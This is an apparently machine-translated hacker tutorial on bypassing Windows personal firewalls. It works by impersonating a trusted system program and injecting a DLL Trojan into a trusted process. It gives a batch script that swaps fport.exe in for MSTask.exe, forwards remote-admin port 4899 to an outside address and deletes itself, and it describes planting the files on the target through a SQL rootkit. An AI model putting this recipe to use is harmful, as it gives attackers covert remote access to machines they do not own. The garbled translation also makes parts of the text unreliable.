It has always been a dream: How nice it would be to discover some vulnerabilities or bugs! So I am studying Computer blind and blind all day. What do I study? Study how to break through the firewall (the firewall here refers to a software-based personal firewall, and the hardware is not conditional .) Hey, you don't have to mention it. I did not have a white research, but I have even discovered common faults in most firewalls. This BUG can fool the firewall for external access purposes. What is the specific situation? Please refer to the following explanation!
First, I want to introduce the features of Windows. When a program runs, it cannot be deleted, but can be renamed! When the protected program in the system is deleted or damaged or renamed, the system will promptly call the backup file to restore it! I want to talk about the fire wall program. In general, the application rules of the fire wall program allow the iebrowser (ipolice.exe) and Outlook to Pass, while most firewalls believe that they Pass as long as they are in the same path and file name as the rule! This method is used to determine whether to allow access, but it does not take into account the replacement of other files? -- It is equivalent to the easy-to-use technique in the costume film. After the easy-to-use, you can't recognize it! This gives us the opportunity to use this BUG to cheat the firewall for external access purposes!
TIPS: Prepare process), and then insert the DLL-type Trojan into this thread, then, you can easily break through the firewall's restrictions during access-because the firewall does not intercept authenticated programs.
The principle is over. Now let's talk about how to use this BUG! Here I use a virtual machine to perform experiments and create the following conditions:
To be more realistic, I installed Skynet firewall and Radmin on the server (however, the access IP address is specified in the firewall, so there is no way to connect normally !), Mssql server and Serv-u. First, we use common methods for port forwarding to see how the firewall responds!
Step 1: Enable Fport in AngelShell Ver 1.0 (the server used for port forwarding, almost any port can be forwarded), and then use FportClient locally (the client used for port forwarding) listen!
Step 2: directly run "e: \ www \ fport.exe 4899 192.168.1.1 7788" in mongoshell. Then we can see that "Skynet" in the virtual machine immediately blocks Fport.
See it! Because Fport does not allow authentication, the firewall immediately blocks it! Okay. Now we have a spoofing plan to see how we break through the firewall! Perform the first step and create a new batch. The content is as follows:
Ren MSTask.exe MSTask1.exe
Ren fport.exe MSTask.exe
MSTask.exe 4899 192.168.1.1 7788
Del % 0
The name is go.bat, and the sqlrootkitcommand is used to copy the program fport.exe "and go. bat to the c: \ winnt \ system32 \ role name of the target machine, and the Administrator permission is required ).
When FportClient says "the connection to the remote computer has been accepted !" Use the Radmin client to connect to port 4899 of the local machine.
We have successfully broken through the restrictions (because the firewall does not limit the local connection to port 4899, we use Fport to forward its port, and the login is equal to the local connection, so we can successfully connect). In this way, we could not have escaped the firewall's Fport and turned into a port forwarding tool with the plug-in thread technology!
According to my experiments, almost all firewalls in China have the BUG of "ownership! Although this BUG does not bring any major harm, it always gives intruders an opportunity to hack into us!
The boss of WTF said that we are not as happy as everyone else, so I announced it. First, we can improve the firewall in China, and second, we should remind the network administrators! Due to the limited technical skills of the younger brother, errors may inevitably occur. Thank you for your criticism.